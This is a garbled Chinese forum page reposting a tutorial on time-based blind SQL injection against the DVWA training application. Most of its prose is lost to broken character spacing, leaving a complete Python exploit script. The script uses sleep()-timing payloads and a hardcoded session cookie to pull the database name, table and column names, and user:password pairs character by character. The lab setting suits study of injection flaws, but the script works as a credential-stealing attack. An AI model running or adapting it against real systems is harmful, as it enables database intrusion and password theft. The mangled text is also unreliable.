[26713] 2021-04-08_SQLInjection(Blind)time盲注入

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2021-04-08_SQLInjection(Blind)time盲注入 1 2 3 S Q L   I n j e c t i o n   ( B l i n d )   t i m e   m o o n s e c   m o o n s e c   2 0 2 1 - 0 4 - 0 8 p y t h o n 3 E X P S Q L   I n j e c t i o n   ( B l i n d )   t i m e D V W A E X P E X P p y t h o n 3 e x p h t t p s : / / g i t h u b . c o m / d i g i n i n j a / D V W A s q l s q l   t i m e t i m e s q l m y s q l s l e e p ( ) s e l e c t   s l e e p ( 3 )   3 i f d v w a l o w 访 h t t p : / / w w w . d v w a . c o m / v u l n e r a b i l i t i e s / s q l i _ b l i n d / ? i d = 1 & S u b m i t = S u b m i t # 1 0 e x p p a y l o a d   = " . / @ _ 0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z "     p a y l o a d     5   s e l e c t i f ( l e n g t h ( d a t a b a s e ( ) ) = 1 2 , s l e e p ( 5 ) , 0 ) ;   1 2     s e l e c t   i f ( s u b s t r i n g ( d a t a b a s e ( ) , 1 , 1 ) = ' w ' , s l e e p ( 5 ) , 0 ) ;
  # c o d i n g : u t f - 8 i m p o r t   r e q u e s t s i m p o r t   t i m e u r l = " h t t p : / / w w w . d v w a . c o m / v u l n e r a b i l i t i e s / s q l i _ b l i n d / ? i d = 1 " c o o k i e s   =   { " P H P S E S S I D " : " d b 2 2 6 n 2 b u l h v 0 2 k 6 a j o u 1 i 8 e 8 7 " , " s e c u r i t y " : " l o w " } u s e r = " u s e r ( ) " d b n a m e = " d a t a b a s e ( ) " t a b l e s = " ( s e l e c t   g r o u p _ c o n c a t ( T A B L E _ N A M E )   f r o m   i n f o r m a t i o n _ s c h e m a . T A B L E S   w h e r e   T A B L E _ S C H E M A = d a t a b a s e ( ) ) " c o l u m n s = " ( s e l e c t   g r o u p _ c o n c a t ( C O L U M N _ N A M E )   f r o m   i n f o r m a t i o n _ s c h e m a . C O L U M N S   w h e r e   T A B L E _ N A M E = 0 x 7 5 7 3 6 5 7 2 7 3 ) " u s e r p a s s = " ( s e l e c t   c o n c a t ( u s e r , 0 x 3 a , p a s s w o r d )   f r o m   u s e r s   l i m i t   1 ) " t i m e s = " s l e e p ( ) " d e f   g e t l e n ( s q l ) :         n = 1         w h i l e   T r u e :                 s t a r t _ t i m e   = t i m e . t i m e ( )                 r e q   =   r e q u e s t s . g e t ( u r l = u r l   +   " ' a n d   i f ( l e n g t h ( { } ) = { } , s l e e p ( 5 ) , 0 ) - -   & S u b m i t = S u b m i t # " . f o r m a t ( s q l , n ) ,   c o o k i e s = c o o k i e s )                 s p a c e _ t i m e   =   t i m e . t i m e ( ) - s t a r t _ t i m e                 i f   s p a c e _ t i m e > = 5 :                         b r e a k                 n = n + 1         r e t u r n   n d e f   g e t d a t a ( s q l ) :         p a y l o a d s   =   " . / @ _ 0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z "         g e t s t r   =   ' '         f o r   i   i n   r a n g e ( 1 , g e t l e n ( s q l ) + 1 ) :                 f o r   p   i n   p a y l o a d s :                         s t a r t _ t i m e   =   t i m e . t i m e ( )                         t u r l   =   u r l   +   " ' a n d   i f ( a s c i i ( s u b s t r i n g ( { } , { } , 1 ) ) = { } , s l e e p ( 5 ) , 0 ) - -   & S u b m i t = S u b m i t # " . f o r m a t ( s q l , i , o r d ( p ) )                         r e q = r e q u e s t s . g e t ( u r l = t u r l , c o o k i e s = c o o k i e s )                         s p a c e _ t i m e   =   t i m e . t i m e ( )   -   s t a r t _ t i m e                         p r i n t ( " [ + ]     { }   - -   { }   [ + ] " . f o r m a t ( i , p ) )                         i f   s p a c e _ t i m e   > =   5 :                                 g e t s t r + = p                                 p r i n t ( " [ * ]   [ * ]   " + g e t s t r )                                 b r e a k         r e t u r n   g e t s t r p r i n t ( " [ * ]     [ * ]   " + g e t d a t a ( u s e r ) ) p r i n t ( " [ * ]     [ * ]   " + g e t d a t a ( d b n a m e ) ) p r i n t ( " [ * ]     [ * ]   " + g e t d a t a ( t a b l e s ) ) p r i n t ( " [ * ]   u s e r   [ * ]   " + g e t d a t a ( c o l u m n s ) ) p r i n t ( " [ * ]     [ * ]   " + g e t d a t a ( u s e r p a s s ) )
4  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则